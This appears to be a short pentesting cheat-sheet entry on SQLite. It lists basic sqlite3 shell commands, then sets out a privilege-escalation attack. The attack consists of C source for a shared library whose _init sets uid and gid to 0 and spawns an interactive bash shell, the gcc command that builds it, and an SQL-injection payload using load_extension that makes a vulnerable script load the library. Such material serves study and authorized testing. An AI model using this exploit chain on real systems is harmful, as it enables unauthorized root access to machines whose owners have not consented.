SQLite

SQLite

Commands

# Open DB file
.open <your_file.db>

# List databases
.databases

# List tables
.tables

# Structure of table
.schema <table>

Command Execution

load_extension

Suppose we're on Linux and there's a bash script which asks for a username that will be used to activate the user.

The commands looks like this:

/usr/bin/sqlite3 db.sqlite3 -line \'UPDATE accounts_customuser SET is_active=1 WHERE username=\"%s\";\'

We need to create a .c script that we compile into a library.

// test.c
#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("/bin/bash -i");
}

gcc -shared -fPIC -nostartfiles -o test.so test.c

This library will spawn an elevated shell.

For this to work we're going to create a payload that we'll feed to the script. Once the script reaches the point where the username is used in the sql statement, a shell with elevated privileges will be spawned.

"+load_extension('test.so')+"